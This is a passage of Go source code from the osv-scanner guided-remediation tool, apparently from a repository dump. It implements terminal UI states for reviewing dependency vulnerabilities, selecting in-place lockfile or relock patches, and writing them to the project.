range p.ResolvedVulns { allVulns = append(allVulns, &p.ResolvedVulns[i]) } } for i := range m.inPlaceResult.Unfixable { allVulns = append(allVulns, &m.inPlaceResult.Unfixable[i]) } st.vulnList = tui.NewVulnList(allVulns, "") // make the in-place view st.inPlaceInfo = tui.NewInPlaceInfo(*m.inPlaceResult) if m.options.Manifest != "" { // find the vulns fixed by relocking to show on the relock hover st.canRelock = true var relockFixes []*resolution.Vulnerability for _, v := range allVulns { if !slices.ContainsFunc(m.relockBaseRes.Vulns, func(r resolution.Vulnerability) bool { return r.OSV.GetId() == v.OSV.GetId() }) { relockFixes = append(relockFixes, v) } } st.relockFixVulns = tui.NewVulnList(relockFixes, "Relocking fixes the following vulns:") st.ResizeInfo(m.infoViewWidth, m.infoViewHeight) } else { st.canRelock = false st.relockFixVulns = infoStringView("Re-run with manifest to resolve vulnerabilities by re-locking") } st.depthInput = textinput.New() st.depthInput.CharLimit = 3 st.depthInput.SetValue(strconv.Itoa(m.options.MaxDepth)) st.severityInput = textinput.New() st.severityInput.CharLimit = 4 st.severityInput.SetValue(strconv.FormatFloat(m.options.MinSeverity, 'g', -1, 64)) st.errorsView = resolutionErrorView(m.relockBaseRes, m.relockBaseResErrs) return nil } func (st *stateChooseStrategy) Update(m model, msg tea.Msg) (tea.Model, tea.Cmd) { switch msg := msg.(type) { case tui.ViewModelCloseMsg: // info view wants to quit, just unfocus it st.focusedInfo = nil case tea.KeyPressMsg: switch { case key.Matches(msg, tui.Keys.SwitchView): if st.IsInfoFocused() { st.focusedInfo = nil } else if view, canFocus := st.currentInfoView(); canFocus { st.focusedInfo = view } case st.IsInfoFocused(): var cmd tea.Cmd st.focusedInfo, cmd = st.focusedInfo.Update(msg) return m, cmd case key.Matches(msg, tui.Keys.Quit): // only quit if the cursor is over the quit line if st.cursorPos == stateChooseQuit { return m, tea.Quit } // otherwise move the cursor to the quit line if it's not already there st.cursorPos = stateChooseQuit case key.Matches(msg, tui.Keys.Select): // enter key was pressed, parse input return st.parseInput(m) // move the cursor and show the corresponding info view case key.Matches(msg, tui.Keys.Up): if st.cursorPos > stateChooseInfo { st.cursorPos-- // Resolution errors aren't rendered if there are none if st.cursorPos == stateChooseErrors && len(m.relockBaseResErrs) == 0 { st.cursorPos-- } } st.UpdateTextFocus() case key.Matches(msg, tui.Keys.Down): if st.cursorPos < stateChooseEnd-1 { st.cursorPos++ if st.cursorPos == stateChooseErrors && len(m.relockBaseResErrs) == 0 { st.cursorPos++ } } st.UpdateTextFocus() } } cmds := make([]tea.Cmd, 0, 2) var cmd tea.Cmd st.depthInput, cmd = st.depthInput.Update(msg) cmds = append(cmds, cmd) st.severityInput, cmd = st.severityInput.Update(msg) cmds = append(cmds, cmd) return m, tea.Batch(cmds...) } func (st *stateChooseStrategy) UpdateTextFocus() { st.depthInput.Blur() st.severityInput.Blur() switch st.cursorPos { case stateChooseDepth: st.depthInput.Focus() case stateChooseSeverity: st.severityInput.Focus() } } func (st *stateChooseStrategy) IsInfoFocused() bool { return st.focusedInfo != nil } func (st *stateChooseStrategy) currentInfoView() (view tui.ViewModel, canFocus bool) { switch st.cursorPos { case stateChooseInfo: // info line return st.vulnList, true case stateChooseErrors: return st.errorsView, false case stateChooseInPlace: // in-place return st.inPlaceInfo, true case stateChooseRelock: // relock return st.relockFixVulns, st.canRelock case stateChooseQuit: // quit return infoStringView("Exit Guided Remediation"), false default: return emptyInfoView, false } } func (st *stateChooseStrategy) parseInput(m model) (tea.Model, tea.Cmd) { var cmd tea.Cmd switch st.cursorPos { case stateChooseInfo: // info line, focus on info view st.focusedInfo = st.vulnList case stateChooseInPlace: // in-place // initially have every change be selected to be applied selected := make([]bool, len(m.inPlaceResult.Patches)) for i := range selected { selected[i] = true } m.st = &stateInPlaceResult{inPlaceInfo: st.inPlaceInfo, selectedChanges: selected} cmd = m.st.Init(m) case stateChooseRelock: // relock if st.canRelock { m.st = &stateRelockResult{} cmd = m.st.Init(m) } case stateChooseDev: m.options.DevDeps = !m.options.DevDeps case stateChooseApplyCriteria: maxDepth, err := strconv.Atoi(st.depthInput.Value()) if err == nil { m.options.MaxDepth = maxDepth } minSeverity, err := strconv.ParseFloat(st.severityInput.Value(), 64) if err == nil { m.options.MinSeverity = minSeverity } // Reset state. TODO: Add a spinner and do this I/O as a command. res, err := remediation.ComputeInPlacePatches(m.ctx, m.cl, m.lockfileGraph, m.options.Options) if err != nil { panic(err) } m.inPlaceResult = &res m.relockBaseRes.FilterVulns(m.options.MatchVuln) m.st = &stateChooseStrategy{} cmd = m.st.Init(m) case stateChooseQuit: // quit line cmd = tea.Quit } return m, cmd } func (st *stateChooseStrategy) View(m model) string { vulnCount := m.inPlaceResult.VulnCount() fixCount := vulnCount.Total() - len(m.inPlaceResult.Unfixable) pkgChange := len(m.inPlaceResult.Patches) s := strings.Builder{} s.WriteString(tui.RenderSelectorOption( st.cursorPos == stateChooseInfo, "", fmt.Sprintf("Found %%s in lockfile (%d direct, %d transitive, %d dev only) matching the criteria.\n", vulnCount.Direct, vulnCount.Transitive, vulnCount.Dev), fmt.Sprintf("%d vulnerabilities", vulnCount.Total()), )) if len(m.relockBaseResErrs) > 0 { s.WriteString(tui.RenderSelectorOption( st.cursorPos == stateChooseErrors, "", "WARNING: Encountered %s during graph resolution.\n", fmt.Sprintf("%d errors", len(m.relockBaseResErrs)), )) } s.WriteString("\n") s.WriteString("Actions:\n") s.WriteString(tui.RenderSelectorOption( st.cursorPos == stateChooseInPlace, " > ", fmt.Sprintf("%%s (fixes %d/%d vulns, changes %d packages)\n", fixCount, vulnCount.Total(), pkgChange), "Modify lockfile in-place", )) // TODO: skip choseStrategy when relocking is unavailable if st.canRelock { // TODO: In-place and relock count vulns differently; this number is wrong relockFix := vulnCount.Total() - len(m.relockBaseRes.Vulns) s.WriteString(tui.RenderSelectorOption( st.cursorPos == stateChooseRelock, " > ", fmt.Sprintf("%%s (fixes %d/%d vulns) and try direct dependency upgrades\n", relockFix, vulnCount.Total()), "Re-lock project", )) } else { s.WriteString(tui.RenderSelectorOption( st.cursorPos == stateChooseRelock, " > ", tui.DisabledTextStyle.Render("Cannot re-lock - missing manifest file\n"), )) } s.WriteString("\n") s.WriteString("Criteria:\n") s.WriteString(tui.RenderSelectorOption( st.cursorPos == stateChooseDepth, " > ", fmt.Sprintf("%%s: %s\n", st.depthInput.View()), "Max dependency depth", )) s.WriteString(tui.RenderSelectorOption( st.cursorPos == stateChooseSeverity, " > ", fmt.Sprintf("%%s: %s\n", st.severityInput.View()), "Min CVSS score", )) devString := "YES" if m.options.DevDeps { devString = "NO" } s.WriteString(tui.RenderSelectorOption( st.cursorPos == stateChooseDev, " > ", fmt.Sprintf("%%s: %s\n", devString), "Exclude dev only", )) s.WriteString(tui.RenderSelectorOption( st.cursorPos == stateChooseApplyCriteria, " > ", "%s\n", "Apply criteria", )) s.WriteString("\n") s.WriteString(tui.RenderSelectorOption( st.cursorPos == stateChooseQuit, "> ", "%s\n", "quit", )) return s.String() } func (st *stateChooseStrategy) InfoView() string { v, _ := st.currentInfoView() return v.View() } func (st *stateChooseStrategy) Resize(_, _ int) {} func (st *stateChooseStrategy) ResizeInfo(w, h int) { st.vulnList.Resize(w, h) st.inPlaceInfo.Resize(w, h) st.relockFixVulns.Resize(w, h) } ================================================ FILE: cmd/osv-scanner/fix/state-in-place-result.go ================================================ package fix import ( "fmt" "slices" "strings" "charm.land/bubbles/v2/key" tea "charm.land/bubbletea/v2" "github.com/google/osv-scanner/v2/internal/remediation" "github.com/google/osv-scanner/v2/internal/resolution" lockf "github.com/google/osv-scanner/v2/internal/resolution/lockfile" "github.com/google/osv-scanner/v2/internal/tui" ) type stateInPlaceResult struct { cursorPos int // TODO: use an enum canRelock bool selectedChanges []bool // in-place changes to be applied vulnList tui.ViewModel inPlaceInfo tui.ViewModel relockFixVulns tui.ViewModel focusedInfo tui.ViewModel // the infoview that is currently focused, nil if not focused } const ( stateInPlaceFixed = iota stateInPlaceRemain stateInPlaceChoice stateInPlaceWrite stateInPlaceRelock stateInPlaceQuit stateInPlaceEnd ) func (st *stateInPlaceResult) Init(m model) tea.Cmd { // pre-generate the info views for each option // inPlaceInfo is given to this by stateChooseStrategy when it makes this struct // Get the list of remaining vulns vulns := make([]*resolution.Vulnerability, len(m.inPlaceResult.Unfixable)) for i := range m.inPlaceResult.Unfixable { vulns[i] = &m.inPlaceResult.Unfixable[i] } st.vulnList = tui.NewVulnList(vulns, "") // recompute the vulns fixed by relocking after the in-place update if m.options.Manifest != "" { st.canRelock = true var relockFixes []*resolution.Vulnerability for _, v := range vulns { if !slices.ContainsFunc(m.relockBaseRes.Vulns, func(r resolution.Vulnerability) bool { return r.OSV.GetId() == v.OSV.GetId() }) { relockFixes = append(relockFixes, v) } } st.relockFixVulns = tui.NewVulnList(relockFixes, "Relocking fixes the following vulns:") } else { st.canRelock = false st.relockFixVulns = infoStringView("Re-run with manifest to resolve vulnerabilities by re-locking") } st.cursorPos = stateInPlaceChoice st.ResizeInfo(m.infoViewWidth, m.infoViewHeight) return nil } func (st *stateInPlaceResult) Update(m model, msg tea.Msg) (tea.Model, tea.Cmd) { var cmd tea.Cmd switch msg := msg.(type) { case writeMsg: // just finished writing & installing the lockfile if msg.err != nil { return errorAndExit(m, msg.err) } m.writing = false // remove the written in-place changes var newPatches []remediation.InPlacePatch for i, selected := range st.selectedChanges { if !selected { newPatches = append(newPatches, m.inPlaceResult.Patches[i]) } } m.inPlaceResult.Patches = newPatches // unselect all changes st.selectedChanges = make([]bool, len(newPatches)) // regenerate the in-place info panel st.inPlaceInfo = tui.NewInPlaceInfo(*m.inPlaceResult) return m, cmd case tui.ViewModelCloseMsg: // info view wants to quit, just unfocus it st.focusedInfo = nil case tea.KeyPressMsg: switch { case key.Matches(msg, tui.Keys.SwitchView): if st.IsInfoFocused() { st.focusedInfo = nil } else if view, canFocus := st.currentInfoView(); canFocus { st.focusedInfo = view } case st.IsInfoFocused(): st.focusedInfo, cmd = st.focusedInfo.Update(msg) case key.Matches(msg, tui.Keys.Quit): // only quit if the cursor is over the quit line if st.cursorPos == stateInPlaceQuit { return m, tea.Quit } // move the cursor to the quit line if it's not already there st.cursorPos = stateInPlaceQuit case key.Matches(msg, tui.Keys.Select): // enter key was pressed, parse input return st.parseInput(m) // move the cursor and show the corresponding info view case key.Matches(msg, tui.Keys.Up): if st.cursorPos > stateInPlaceFixed { st.cursorPos-- } case key.Matches(msg, tui.Keys.Down): if st.cursorPos < stateInPlaceEnd-1 { st.cursorPos++ } } } return m, cmd } func (st *stateInPlaceResult) currentInfoView() (view tui.ViewModel, canFocus bool) { switch st.cursorPos { case stateInPlaceFixed: // info - fixed vulns return st.inPlaceInfo, true case stateInPlaceRemain: // info - remaining vulns return st.vulnList, true case stateInPlaceChoice: // choose changes return infoStringView("Choose which changes to apply"), false case stateInPlaceWrite: // write return infoStringView("Write changes to lockfile"), false case stateInPlaceRelock: // relock return st.relockFixVulns, st.canRelock case stateInPlaceQuit: // quit return infoStringView("Exit Guided Remediation"), false default: return emptyInfoView, false } } func (st *stateInPlaceResult) parseInput(m model) (tea.Model, tea.Cmd) { var cmd tea.Cmd switch st.cursorPos { case stateInPlaceFixed, stateInPlaceRemain: // info lines, focus info view v, _ := st.currentInfoView() st.focusedInfo = v case stateInPlaceChoice: // choose specific patches m.st = &stateChooseInPlacePatches{stateInPlace: st} cmd = m.st.Init(m) case stateInPlaceWrite: // write m.writing = true cmd = func() tea.Msg { return st.write(m) } case stateInPlaceRelock: // relock if st.canRelock { m.st = &stateRelockResult{} cmd = m.st.Init(m) } case stateInPlaceQuit: // quit cmd = tea.Quit } return m, cmd } func (st *stateInPlaceResult) View(m model) string { if m.writing { return "" } remainCount := len(m.inPlaceResult.Unfixable) fixCount := m.inPlaceResult.VulnCount().Total() - remainCount pkgCount := len(m.inPlaceResult.Patches) nSelected := 0 for _, s := range st.selectedChanges { if s { nSelected++ } } s := strings.Builder{} s.WriteString("IN-PLACE\n") // TODO: better page title/layout s.WriteString(tui.RenderSelectorOption( st.cursorPos == stateInPlaceFixed, "", fmt.Sprintf("%%s can be changed, fixing %d vulnerabilities\n", fixCount), fmt.Sprintf("%d packages", pkgCount), )) s.WriteString(tui.RenderSelectorOption( st.cursorPos == stateInPlaceRemain, "", "%s remain\n", fmt.Sprintf("%d vulnerabilities", remainCount), )) s.WriteString("\n") s.WriteString("Actions:\n") s.WriteString(tui.RenderSelectorOption( st.cursorPos == stateInPlaceChoice, " > ", "%s which changes to apply\n", "Choose", )) s.WriteString(tui.RenderSelectorOption( st.cursorPos == stateInPlaceWrite, " > ", fmt.Sprintf("%%s %d changes to lockfile\n", nSelected), "Write", )) if st.canRelock { s.WriteString(tui.RenderSelectorOption( st.cursorPos == stateInPlaceRelock, " > ", "%s the whole project instead\n", "Relock", )) } else { s.WriteString(tui.RenderSelectorOption( st.cursorPos == stateInPlaceRelock, " > ", tui.DisabledTextStyle.Render("Cannot re-lock - missing manifest file\n"), )) } s.WriteString("\n") s.WriteString(tui.RenderSelectorOption( st.cursorPos == stateInPlaceQuit, "> ", "%s without saving changes\n", "quit", )) return s.String() } func (st *stateInPlaceResult) InfoView() string { v, _ := st.currentInfoView() return v.View() } func (st *stateInPlaceResult) Resize(_, _ int) {} func (st *stateInPlaceResult) ResizeInfo(w, h int) { st.inPlaceInfo.Resize(w, h) st.vulnList.Resize(w, h) st.relockFixVulns.Resize(w, h) } func (st *stateInPlaceResult) IsInfoFocused() bool { return st.focusedInfo != nil } // TODO: Work out a better way to output npm commands func (st *stateInPlaceResult) write(m model) tea.Msg { var changes []lockf.DependencyPatch for i, p := range m.inPlaceResult.Patches { if st.selectedChanges[i] { changes = append(changes, p.DependencyPatch) } } if err := lockf.Overwrite(m.options.LockfileRW, m.options.Lockfile, changes); err != nil { return writeMsg{err} } return writeMsg{nil} } ================================================ FILE: cmd/osv-scanner/fix/state-initialize.go ================================================ package fix import ( "fmt" "strings" "charm.land/bubbles/v2/spinner" tea "charm.land/bubbletea/v2" "github.com/google/osv-scanner/v2/internal/tui" ) type stateInitialize struct { spinner spinner.Model // the loading spinner used to show progress } func (st *stateInitialize) Init(m model) tea.Cmd { // create the loading spinner st.spinner = tui.NewSpinner() cmds := []tea.Cmd{st.spinner.Tick} // TODO: both in-place/relock could potentially be done in parallel if m.options.Lockfile != "" { // if we have a lockfile, start calculating the in-place updates cmds = append(cmds, func() tea.Msg { return doInPlaceResolution(m.ctx, m.cl, m.options) }) } else { // if we don't have a lockfile, start calculating the relock result cmds = append(cmds, func() tea.Msg { return doInitialRelock(m.ctx, m.options) }) } return tea.Batch(cmds...) } func (st *stateInitialize) Update(m model, msg tea.Msg) (tea.Model, tea.Cmd) { var cmds []tea.Cmd switch msg := msg.(type) { // in-place resolution finished case inPlaceResolutionMsg: if msg.err != nil { return errorAndExit(m, msg.err) } // set the result and start the relock computation m.lockfileGraph = msg.g m.inPlaceResult = &msg.res if m.options.Manifest != "" { cmds = append(cmds, func() tea.Msg { return doInitialRelock(m.ctx, m.options) }) } else { // TODO: skip choose strategy, go straight to in-place m.st = &stateChooseStrategy{} cmds = append(cmds, m.st.Init(m)) } // relocking finished case doRelockMsg: if msg.err != nil { return errorAndExit(m, msg.err) } // set the result and go to next state m.relockBaseRes = msg.res m.relockBaseResErrs = m.relockBaseRes.Errors() if m.options.Lockfile == "" { m.st = &stateRelockResult{} cmds = append(cmds, m.st.Init(m)) } else { m.st = &stateChooseStrategy{} cmds = append(cmds, m.st.Init(m)) } } var c tea.Cmd st.spinner, c = st.spinner.Update(msg) cmds = append(cmds, c) return m, tea.Batch(cmds...) } func (st *stateInitialize) View(m model) string { s := strings.Builder{} if m.options.Lockfile == "" { s.WriteString("No lockfile provided. Assuming re-lock.\n") } else { fmt.Fprintf(&s, "Scanning %s ", tui.SelectedTextStyle.Render(m.options.Lockfile)) if m.inPlaceResult == nil { s.WriteString(st.spinner.View()) s.WriteString("\n") return s.String() } s.WriteString("✓\n") } fmt.Fprintf(&s, "Resolving %s ", tui.SelectedTextStyle.Render(m.options.Manifest)) if m.relockBaseRes == nil { s.WriteString(st.spinner.View()) s.WriteString("\n") } else { s.WriteString("✓\n") } // TODO: show non-fatal resolution errors somewhere return s.String() } func (st *stateInitialize) InfoView() string { return "" } func (st *stateInitialize) Resize(_, _ int) {} func (st *stateInitialize) ResizeInfo(_, _ int) {} func (st *stateInitialize) IsInfoFocused() bool { return false } ================================================ FILE: cmd/osv-scanner/fix/state-relock-result.go ================================================ package fix import ( "context" "fmt" "strings" "charm.land/bubbles/v2/key" "charm.land/bubbles/v2/spinner" tea "charm.land/bubbletea/v2" "charm.land/lipgloss/v2" "github.com/google/osv-scanner/v2/internal/remediation" "github.com/google/osv-scanner/v2/internal/resolution" "github.com/google/osv-scanner/v2/internal/resolution/client" manif "github.com/google/osv-scanner/v2/internal/resolution/manifest" "github.com/google/osv-scanner/v2/internal/tui" ) type stateRelockResult struct { currRes *resolution.Result // In-progress relock result, with user-selected patches applied currErrs []resolution.NodeError // In-progress relock errors patches []resolution.Difference // current possible patches applicable to relockCurrRes patchesDone bool // whether the relockPatches has finished being computed numUnfixable int // count of unfixable vulns, for rendering spinner spinner.Model cursorPos int // TODO: use an enum ? selectedPatches map[int]struct{} // currently pending selected patches viewWidth int // width for rendering (same as model.mainViewWidth) vulnList tui.ViewModel unfixableList tui.ViewModel patchInfo []tui.ViewModel resolveErrors tui.ViewModel focusedInfo tui.ViewModel // the infoview that is currently focused, nil if not focused } const ( stateRelockRemain = iota stateRelockUnfixable stateRelockErrors stateRelockPatches stateRelockApply stateRelockWrite stateRelockQuit stateRelockEnd ) // gets the cursor position, accounting for the arbitrary number of relockPatches // returns stateRelockPatches if over ANY of the relockPatches func (st *stateRelockResult) getEffectiveCursor() int { if st.cursorPos < stateRelockPatches { return st.cursorPos } if len(st.patches) == 0 { // skip over stateRelockPatches and stateRelockApply return st.cursorPos + 2 } if st.cursorPos < stateRelockPatches+len(st.patches) { return stateRelockPatches } return st.cursorPos - len(st.patches) + 1 } // sets the cursor to the effective position, accounting for the arbitrary number of relockPatches // setting to stateRelockPatches will go to first patch func (st *stateRelockResult) setEffectiveCursor(pos int) { switch { case pos <= stateRelockPatches: st.cursorPos = pos case len(st.patches) == 0: st.cursorPos = pos - 2 default: st.cursorPos = pos + len(st.patches) - 1 } } // get the index of the patch the cursor is currently over func (st *stateRelockResult) getPatchIndex() int { return st.cursorPos - stateRelockPatches } func (st *stateRelockResult) Init(m model) tea.Cmd { st.currRes = m.relockBaseRes st.currErrs = m.relockBaseResErrs st.resolveErrors = resolutionErrorView(st.currRes, st.currErrs) st.patchesDone = false st.spinner = tui.NewSpinner() st.cursorPos = -1 st.selectedPatches = make(map[int]struct{}) st.viewWidth = m.mainViewWidth // Make the vulnerability list view model vulns := make([]*resolution.Vulnerability, len(st.currRes.Vulns)) for i := range st.currRes.Vulns { vulns[i] = &st.currRes.Vulns[i] } st.vulnList = tui.NewVulnList(vulns, "") st.ResizeInfo(m.infoViewWidth, m.infoViewHeight) return tea.Batch( func() tea.Msg { return doComputeRelockPatches(m.ctx, m.cl, st.currRes, m.options) }, // start computing possible patches st.spinner.Tick, // spin the spinner ) } func (st *stateRelockResult) Update(m model, msg tea.Msg) (tea.Model, tea.Cmd) { var cmd tea.Cmd switch msg := msg.(type) { case doRelockMsg: // finished resolving (after selecting multiple patches) if msg.err != nil { return errorAndExit(m, msg.err) } st.currRes = msg.res // recreate the vuln list info view vulns := make([]*resolution.Vulnerability, len(st.currRes.Vulns)) for i := range st.currRes.Vulns { vulns[i] = &st.currRes.Vulns[i] } st.vulnList = tui.NewVulnList(vulns, "") st.currErrs = st.currRes.Errors() st.resolveErrors = resolutionErrorView(st.currRes, st.currErrs) // Compute possible patches again st.patchesDone = false cmd = func() tea.Msg { return doComputeRelockPatches(m.ctx, m.cl, st.currRes, m.options) } case relockPatchMsg: // patch computation done if msg.err != nil { return errorAndExit(m, msg.err) } st.patches = msg.patches clear(st.selectedPatches) st.buildPatchInfoViews(m) st.patchesDone = true if len(st.patches) > 0 { // place the cursor on the first patch st.setEffectiveCursor(stateRelockPatches) } else { // no patches, place the cursor on the 'write' line st.setEffectiveCursor(stateRelockWrite) } case writeMsg: // just finished writing & installing the manifest if msg.err != nil { return errorAndExit(m, msg.err) } m.writing = false m.relockBaseRes = st.currRes // relockBaseRes must match what is in the package.json m.relockBaseResErrs = m.relockBaseRes.Errors() clear(st.selectedPatches) case tui.ViewModelCloseMsg: // info view wants to quit, just unfocus it st.focusedInfo = nil case tea.KeyPressMsg: if !st.patchesDone { // Don't accept input in the middle of computation return m, nil } switch { case key.Matches(msg, tui.Keys.SwitchView): if st.IsInfoFocused() { st.focusedInfo = nil } else if view, canFocus := st.currentInfoView(); canFocus { st.focusedInfo = view } case st.IsInfoFocused(): st.focusedInfo, cmd = st.focusedInfo.Update(msg) case key.Matches(msg, tui.Keys.Quit): // only quit if the cursor is over the quit line if st.getEffectiveCursor() == stateRelockQuit { return m, tea.Quit } // move the cursor to the quit line if it's not already there st.setEffectiveCursor(stateRelockQuit) case key.Matches(msg, tui.Keys.Select): // enter key pressed return st.parseInput(m) // move the cursor case key.Matches(msg, tui.Keys.Up): if st.getEffectiveCursor() > stateRelockRemain { st.cursorPos-- if st.getEffectiveCursor() == stateRelockErrors && len(st.currErrs) == 0 { st.cursorPos-- } } case key.Matches(msg, tui.Keys.Down): if st.getEffectiveCursor() < stateRelockEnd-1 { st.cursorPos++ if st.getEffectiveCursor() == stateRelockErrors && len(st.currErrs) == 0 { st.cursorPos++ } } } } var c tea.Cmd st.spinner, c = st.spinner.Update(msg) return m, tea.Batch(cmd, c) } func (st *stateRelockResult) currentInfoView() (view tui.ViewModel, canFocus bool) { switch st.getEffectiveCursor() { case stateRelockRemain: // remaining vulns return st.vulnList, true case stateRelockUnfixable: // unfixable vulns return st.unfixableList, true case stateRelockErrors: return st.resolveErrors, false case stateRelockPatches: // one of the patches return st.patchInfo[st.getPatchIndex()], true case stateRelockApply: return infoStringView("Apply the selected patches and recompute vulnerabilities"), false case stateRelockWrite: return infoStringView("Shell out to write manifest & lockfile"), false case stateRelockQuit: return infoStringView("Exit Guided Remediation"), false default: return emptyInfoView, false // invalid (panic?) } } func (st *stateRelockResult) buildPatchInfoViews(m model) { // create the info view for each of the patches // and the unfixable vulns st.patchInfo = nil for _, p := range st.patches { st.patchInfo = append(st.patchInfo, tui.NewRelockInfo(p)) } unfixableVulns := relockUnfixableVulns(st.patches) st.unfixableList = tui.NewVulnList(unfixableVulns, "") st.numUnfixable = len(unfixableVulns) st.ResizeInfo(m.infoViewWidth, m.infoViewHeight) } func relockUnfixableVulns(diffs []resolution.Difference) []*resolution.Vulnerability { if len(diffs) == 0 { return nil } // find every vuln ID fixed in any patch fixableVulnIDs := make(map[string]struct{}) for _, diff := range diffs { for _, v := range diff.RemovedVulns { fixableVulnIDs[v.OSV.GetId()] = struct{}{} } } // select only vulns that aren't fixed in any patch var unfixable []*resolution.Vulnerability for i, v := range diffs[0].Original.Vulns { if _, ok := fixableVulnIDs[v.OSV.GetId()]; !ok { unfixable = append(unfixable, &diffs[0].Original.Vulns[i]) } } return unfixable } func (st *stateRelockResult) parseInput(m model) (tea.Model, tea.Cmd) { var cmd tea.Cmd switch st.getEffectiveCursor() { case stateRelockRemain: // vuln line, focus info view st.focusedInfo = st.vulnList case stateRelockUnfixable: // unfixable vulns line, focus info ciew st.focusedInfo = st.unfixableList case stateRelockPatches: // patch selected idx := st.getPatchIndex() if _, ok := st.selectedPatches[idx]; ok { // if already selected, deselect it delete(st.selectedPatches, idx) } else if st.patchCompatible(idx) { // if it's compatible with current other selections, select it st.selectedPatches[idx] = struct{}{} } case stateRelockApply: // apply changes if len(st.selectedPatches) > 0 { m, cmd = st.relaxChoice(m) } case stateRelockWrite: // write m.writing = true cmd = func() tea.Msg { return st.write(m) } case stateRelockQuit: // quit cmd = tea.Quit } return m, cmd } func (st *stateRelockResult) relaxChoice(m model) (model, tea.Cmd) { if len(st.selectedPatches) == 1 { // If it's just a single patch, we've already computed the relock result for i := range st.selectedPatches { // selectedPatches is a map, iterate for the single key st.currRes = st.patches[i].New st.currErrs = st.currRes.Errors() st.resolveErrors = resolutionErrorView(st.currRes, st.currErrs) // recreate vuln list view vulns := make([]*resolution.Vulnerability, len(st.currRes.Vulns)) for i := range st.currRes.Vulns { vulns[i] = &st.currRes.Vulns[i] } st.vulnList = tui.NewVulnList(vulns, "") // Need to compute the possible patches from here return m, func() tea.Msg { return doComputeRelockPatches(m.ctx, m.cl, st.currRes, m.options) } } } // Compute combined changes and re-resolve the graph manifest := st.currRes.Manifest.Clone() for i := range st.selectedPatches { for _, dp := range st.patches[i].Deps { for idx := range manifest.Requirements { rv := manifest.Requirements[idx] if rv.Name == dp.Pkg.Name && rv.Version == dp.OrigRequire { rv.Version = dp.NewRequire manifest.Requirements[idx] = rv } } } } st.currRes = nil return m, func() tea.Msg { return doRelock(m.ctx, m.cl, manifest, m.options.ResolveOpts, m.options.MatchVuln) } } func (st *stateRelockResult) View(m model) string { if m.writing { return "" } s := strings.Builder{} s.WriteString("RELOCK\n") if st.currRes == nil { s.WriteString("Resolving dependency graph ") s.WriteString(st.spinner.View()) s.WriteString("\n") return s.String() } s.WriteString(tui.RenderSelectorOption( st.getEffectiveCursor() == stateRelockRemain, "", "%s remain\n", fmt.Sprintf("%d vulnerabilities", len(st.currRes.Vulns)), )) // TODO: Show current staged changes if !st.patchesDone { s.WriteString("\n") s.WriteString("Computing possible patches ") s.WriteString(st.spinner.View()) s.WriteString("\n") return s.String() } s.WriteString(tui.RenderSelectorOption( st.getEffectiveCursor() == stateRelockUnfixable, "", "%s are unfixable\n", fmt.Sprintf("%d vulnerabilities", st.numUnfixable), )) if len(st.currErrs) > 0 { s.WriteString(tui.RenderSelectorOption( st.cursorPos == stateRelockErrors, "", "WARNING: Encountered %s during graph resolution.\n", fmt.Sprintf("%d errors", len(st.currErrs)), )) } s.WriteString("\n") if len(st.patches) == 0 { s.WriteString("No remaining vulnerabilities can be fixed.\n") } else { s.WriteString("Actions:\n") patchStrs := make([]string, len(st.patches)) for i, patch := range st.patches { var checkBox string if _, ok := st.selectedPatches[i]; ok { checkBox = "[x]" } else { checkBox = "[ ]" } if !st.patchCompatible(i) { checkBox = tui.DisabledTextStyle.Render(checkBox) } checkBox = tui.RenderSelectorOption( st.cursorPos == stateRelockPatches+i, " > ", "%s ", checkBox, ) text := diffString(patch) var textSt lipgloss.Style if st.patchCompatible(i) { textSt = lipgloss.NewStyle() } else { textSt = tui.DisabledTextStyle } text = textSt.Width(st.viewWidth - lipgloss.Width(checkBox)).Render(text) patchStrs[i] = lipgloss.JoinHorizontal(lipgloss.Top, checkBox, text) } s.WriteString(lipgloss.JoinVertical(lipgloss.Left, patchStrs...)) s.WriteString("\n") if len(st.selectedPatches) > 0 { s.WriteString(tui.RenderSelectorOption( st.getEffectiveCursor() == stateRelockApply, "> ", "%s pending patches\n", "Apply", )) } else { s.WriteString(tui.RenderSelectorOption( st.getEffectiveCursor() == stateRelockApply, "> ", tui.DisabledTextStyle.Render("No pending patches")+"\n", )) } } s.WriteString(tui.RenderSelectorOption( st.getEffectiveCursor() == stateRelockWrite, "> ", "%s changes to manifest\n", "Write", )) s.WriteString("\n") s.WriteString(tui.RenderSelectorOption( st.getEffectiveCursor() == stateRelockQuit, "> ", "%s without saving changes\n", "quit", )) return s.String() } func diffString(diff resolution.Difference) string { var depStr string if len(diff.Deps) == 1 { dep := diff.Deps[0] depStr = fmt.Sprintf("%s@%s → @%s", dep.Pkg.Name, dep.OrigRequire, dep.NewRequire) } else { depStr = fmt.Sprintf("%d packages", len(diff.Deps)) } str := fmt.Sprintf("Upgrading %s resolves %d vulns", depStr, len(diff.RemovedVulns)) if len(diff.AddedVulns) > 0 { str += fmt.Sprintf(" but introduces %d new vulns", len(diff.AddedVulns)) } return str } func (st *stateRelockResult) InfoView() string { v, _ := st.currentInfoView() return v.View() } // check if a patch is compatible with the currently selected patches // i.e. if none of the direct dependencies in the current patch appear in the already selected patches func (st *stateRelockResult) patchCompatible(idx int) bool { if _, ok := st.selectedPatches[idx]; ok { // already selected, it must be compatible return true } // find any shared direct dependency packages patch := st.patches[idx] for i := range st.selectedPatches { curr := st.patches[i] for _, dep := range curr.Deps { for _, newDep := range patch.Deps { if dep.Pkg == newDep.Pkg { return false } } } } return true } func (st *stateRelockResult) Resize(w, _ int) { st.viewWidth = w } func (st *stateRelockResult) ResizeInfo(w, h int) { st.vulnList.Resize(w, h) for _, info := range st.patchInfo { info.Resize(w, h) } } func (st *stateRelockResult) IsInfoFocused() bool { return st.focusedInfo != nil } // TODO: Work out a better way to output npm commands func (st *stateRelockResult) write(m model) tea.Msg { changes := m.relockBaseRes.CalculateDiff(st.currRes) if err := manif.Overwrite(m.options.ManifestRW, m.options.Manifest, changes.Patch); err != nil { return writeMsg{err} } if m.options.Lockfile == "" { // TODO: there's no user feedback to show this was successful return writeMsg{nil} } // TODO: This will be moved to osv-scalibr, which might have context already c, err := regenerateLockfileCmd(context.TODO(), m.options) if err != nil { return writeMsg{err} } return tea.ExecProcess(c, func(err error) tea.Msg { if err != nil { // try again with "--legacy-peer-deps" c, err := regenerateLockfileCmd(context.TODO(), m.options) if err != nil { return writeMsg{err} } c.Args = append(c.Args, "--legacy-peer-deps") return tea.ExecProcess(c, func(err error) tea.Msg { return writeMsg{err} })() } return writeMsg{err} })() } type relockPatchMsg struct { patches []resolution.Difference err error } // Find all groups of dependency bumps required to resolve each vulnerability individually func doComputeRelockPatches(ctx context.Context, cl 